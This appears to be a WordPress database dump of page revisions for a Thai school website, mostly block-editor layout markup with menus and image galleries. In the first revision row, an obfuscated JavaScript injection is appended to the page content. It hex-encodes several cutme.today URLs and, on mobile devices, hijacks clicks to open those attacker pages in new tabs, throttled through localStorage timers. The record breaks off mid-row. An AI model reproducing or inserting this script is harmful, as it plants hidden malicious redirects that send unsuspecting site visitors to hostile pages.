(41,1,'2024-07-27 20:54:34','2024-07-27 13:54:34','<!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"bcb37a0b\",\"mediaId\":40,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bcb37a0b\"><img class=\"gb-image gb-image-bcb37a0b\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\" alt=\"\" title=\"434878811_122134783502202781_1764078122862278595_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 20:54:34','2024-07-27 13:54:34','',19,'http://watprato.ssk.in.th/?p=41',0,'revision','',0),
(46,1,'2024-07-27 20:57:17','2024-07-27 13:57:17','','นายอนุศักดิ์ พันธ์งาม png','','inherit','open','closed','','%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%a8%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b4%e0%b9%8c-%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c%e0%b8%87%e0%b8%b2%e0%b8%a1-png','','','2024-07-27 20:57:17','2024-07-27 13:57:17','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png',0,'attachment','image/png',0),
(49,1,'2024-07-27 21:02:38','2024-07-27 14:02:38','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"bcb37a0b\",\"mediaId\":40,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bcb37a0b\"><img class=\"gb-image gb-image-bcb37a0b\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\" alt=\"\" title=\"434878811_122134783502202781_1764078122862278595_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 